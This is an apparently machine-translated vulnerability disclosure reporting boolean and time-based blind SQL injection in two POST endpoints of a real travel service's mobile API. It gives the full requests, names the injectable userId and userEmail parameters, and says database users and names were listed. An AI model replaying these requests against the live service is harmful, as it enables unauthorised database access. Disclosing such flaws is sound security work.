Aviation security-the SQL Injection exists in multiple sites of okai

Aviation security-the SQL Injection exists in multiple sites of okai

Objective: To launch okai official APP

SQL Injection exists in the following areas:

I. userId in POST, Boolean blind note
 

POST https://app.travelsky.com/ad//webService/advert-activ/buyOrder.action HTTP/1.1param: 2f554f71c0a145vs9ag496ng3e2dfContent-Length: 56Content-Type: text/plain; charset=utf-8Host: app.travelsky.comConnection: Keep-AliveUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; X9180 Build/KVT49L) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1Cookie: Webtrends=113.118.98.249.1453524354727896Cookie2: $Version=1Accept-Encoding: gzip{"pageNo":"1","pageSize":"10","userId":"[email protected]"}

 

Ii. userEmail in POST, time blind Injection
 

POST https://app.travelsky.com/ad//webService/news/putUserKes.action HTTP/1.1 param: 2f554f71c0a145vs9ag496ng3e2dfContent-Type: application/json; charset = utf-8token: Role: 120 Host: app. travelsky. comConnection: Keep-AliveUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; X9180 Build/KVT49L) AppleWebKit/533.1 (KHTML, like Gecko) version/4.0 Mobile Safari/533.1 Cookie: Webtrends = 113.118.98.249.1453523602202277Cookie2: $ Version = 1Accept-Encoding: gzip {"conKey": "poor content quality", "userEmail ": "[email protected]", "newsId": "20160123504582", "uuid": "863890026674804", "utype": "2 "}

 

1. List current database users
 

2. List the current database
 

 

Solution:

Please kindly advise ~